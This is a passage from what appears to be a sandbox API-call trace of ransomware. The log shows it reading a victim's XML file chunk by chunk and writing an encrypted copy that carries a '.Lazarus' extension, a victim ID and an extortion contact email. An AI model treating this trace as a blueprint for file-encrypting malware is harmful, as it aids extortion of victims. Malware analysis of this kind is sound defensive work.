out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0071.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0071.807] AreFileApisANSI () returned 1 [0071.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0071.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 45 [0071.807] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.807] GetFileType (hFile=0x410) returned 0x1 [0071.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.807] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0071.807] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0071.808] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0071.808] CloseHandle (hObject=0x410) returned 1 [0071.808] AreFileApisANSI () returned 1 [0071.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0071.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 45 [0071.808] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.808] GetFileType (hFile=0x410) returned 0x1 [0071.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.808] CloseHandle (hObject=0x410) returned 1 [0071.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0071.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.809] AreFileApisANSI () returned 1 [0071.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0071.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 45 [0071.809] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c)) returned 1 [0071.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.809] AreFileApisANSI () returned 1 [0071.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.810] GetLastError () returned 0x0 [0071.810] SetLastError (dwErrCode=0x0) [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4de70 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0071.810] GetLastError () returned 0x0 [0071.810] SetLastError (dwErrCode=0x0) [0071.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71758 [0071.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0071.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.810] AreFileApisANSI () returned 1 [0071.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0071.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x80a30 [0071.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0071.811] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.811] GetFileType (hFile=0x410) returned 0x1 [0071.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0071.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0071.811] AreFileApisANSI () returned 1 [0071.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0071.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 45 [0071.811] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.811] GetFileType (hFile=0x418) returned 0x1 [0071.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0071.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.812] GetLastError () returned 0x0 [0071.812] SetLastError (dwErrCode=0x0) [0071.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.812] GetLastError () returned 0x0 [0071.812] SetLastError (dwErrCode=0x0) [0071.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0071.812] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0071.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0071.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0071.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0071.814] GetLastError () returned 0x0 [0071.814] SetLastError (dwErrCode=0x0) [0071.815] GetLastError () returned 0x0 [0071.815] SetLastError (dwErrCode=0x0) [0071.815] GetLastError () returned 0x0 [0071.815] SetLastError (dwErrCode=0x0) [0071.815] GetLastError () returned 0x0 [0071.815] SetLastError (dwErrCode=0x0) [0071.815] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.815] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.816] GetLastError () returned 0x0 [0071.816] SetLastError (dwErrCode=0x0) [0071.816] GetLastError () returned 0x0 [0071.816] SetLastError (dwErrCode=0x0) [0071.816] GetLastError () returned 0x0 [0071.816] SetLastError (dwErrCode=0x0) [0071.816] GetLastError () returned 0x0 [0071.817] SetLastError (dwErrCode=0x0) [0071.817] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.817] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.817] GetLastError () returned 0x0 [0071.817] SetLastError (dwErrCode=0x0) [0071.817] GetLastError () returned 0x0 [0071.817] SetLastError (dwErrCode=0x0) [0071.817] GetLastError () returned 0x0 [0071.817] SetLastError (dwErrCode=0x0) [0071.817] GetLastError () returned 0x0 [0071.817] SetLastError (dwErrCode=0x0) [0071.818] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.818] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.818] GetLastError () returned 0x0 [0071.818] SetLastError (dwErrCode=0x0) [0071.818] GetLastError () returned 0x0 [0071.818] SetLastError (dwErrCode=0x0) [0071.818] GetLastError () returned 0x0 [0071.818] SetLastError (dwErrCode=0x0) [0071.818] GetLastError () returned 0x0 [0071.818] SetLastError (dwErrCode=0x0) [0071.818] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.819] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.819] GetLastError () returned 0x0 [0071.819] SetLastError (dwErrCode=0x0) [0071.819] GetLastError () returned 0x0 [0071.819] SetLastError (dwErrCode=0x0) [0071.819] GetLastError () returned 0x0 [0071.819] SetLastError (dwErrCode=0x0) [0071.819] GetLastError () returned 0x0 [0071.819] SetLastError (dwErrCode=0x0) [0071.819] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.819] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.820] GetLastError () returned 0x0 [0071.820] SetLastError (dwErrCode=0x0) [0071.820] GetLastError () returned 0x0 [0071.820] SetLastError (dwErrCode=0x0) [0071.820] GetLastError () returned 0x0 [0071.820] SetLastError (dwErrCode=0x0) [0071.820] GetLastError () returned 0x0 [0071.820] SetLastError (dwErrCode=0x0) [0071.820] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.820] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.821] GetLastError () returned 0x0 [0071.821] SetLastError (dwErrCode=0x0) [0071.821] GetLastError () returned 0x0 [0071.821] SetLastError (dwErrCode=0x0) [0071.821] GetLastError () returned 0x0 [0071.821] SetLastError (dwErrCode=0x0) [0071.821] GetLastError () returned 0x0 [0071.821] SetLastError (dwErrCode=0x0) [0071.821] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.821] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.821] GetLastError () returned 0x0 [0071.822] SetLastError (dwErrCode=0x0) [0071.822] GetLastError () returned 0x0 [0071.822] SetLastError (dwErrCode=0x0) [0071.822] GetLastError () returned 0x0 [0071.822] SetLastError (dwErrCode=0x0) [0071.822] GetLastError () returned 0x0 [0071.822] SetLastError (dwErrCode=0x0) [0071.822] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.822] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.822] GetLastError () returned 0x0 [0071.822] SetLastError (dwErrCode=0x0) [0071.822] GetLastError () returned 0x0 [0071.823] SetLastError (dwErrCode=0x0) [0071.823] GetLastError () returned 0x0 [0071.823] SetLastError (dwErrCode=0x0) [0071.823] GetLastError () returned 0x0 [0071.823] SetLastError (dwErrCode=0x0) [0071.823] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.823] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.823] GetLastError () returned 0x0 [0071.823] SetLastError (dwErrCode=0x0) [0071.823] GetLastError () returned 0x0 [0071.823] SetLastError (dwErrCode=0x0) [0071.824] GetLastError () returned 0x0 [0071.824] SetLastError (dwErrCode=0x0) [0071.824] GetLastError () returned 0x0 [0071.824] SetLastError (dwErrCode=0x0) [0071.824] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.824] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.824] GetLastError () returned 0x0 [0071.824] SetLastError (dwErrCode=0x0) [0071.824] GetLastError () returned 0x0 [0071.824] SetLastError (dwErrCode=0x0) [0071.824] GetLastError () returned 0x0 [0071.824] SetLastError (dwErrCode=0x0) [0071.825] GetLastError () returned 0x0 [0071.825] SetLastError (dwErrCode=0x0) [0071.825] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.825] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.825] GetLastError () returned 0x0 [0071.825] SetLastError (dwErrCode=0x0) [0071.825] GetLastError () returned 0x0 [0071.825] SetLastError (dwErrCode=0x0) [0071.825] GetLastError () returned 0x0 [0071.825] SetLastError (dwErrCode=0x0) [0071.825] GetLastError () returned 0x0 [0071.825] SetLastError (dwErrCode=0x0) [0071.826] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.826] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.826] GetLastError () returned 0x0 [0071.826] SetLastError (dwErrCode=0x0) [0071.826] GetLastError () returned 0x0 [0071.826] SetLastError (dwErrCode=0x0) [0071.826] GetLastError () returned 0x0 [0071.826] SetLastError (dwErrCode=0x0) [0071.826] GetLastError () returned 0x0 [0071.826] SetLastError (dwErrCode=0x0) [0071.826] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.827] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.827] GetLastError () returned 0x0 [0071.827] SetLastError (dwErrCode=0x0) [0071.827] GetLastError () returned 0x0 [0071.827] SetLastError (dwErrCode=0x0) [0071.827] GetLastError () returned 0x0 [0071.827] SetLastError (dwErrCode=0x0) [0071.827] GetLastError () returned 0x0 [0071.827] SetLastError (dwErrCode=0x0) [0071.827] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0xd0c, lpOverlapped=0x0) returned 1 [0071.827] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.828] GetLastError () returned 0x0 [0071.828] SetLastError (dwErrCode=0x0) [0071.828] GetLastError () returned 0x0 [0071.828] SetLastError (dwErrCode=0x0) [0071.828] GetLastError () returned 0x0 [0071.828] SetLastError (dwErrCode=0x0) [0071.828] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0071.828] GetLastError () returned 0x0 [0071.828] SetLastError (dwErrCode=0x0) [0071.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc) returned 0x7d618 [0071.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0071.828] GetLastError () returned 0x0 [0071.828] SetLastError (dwErrCode=0x0) [0071.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0071.829] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0xd10, lpOverlapped=0x0) returned 1 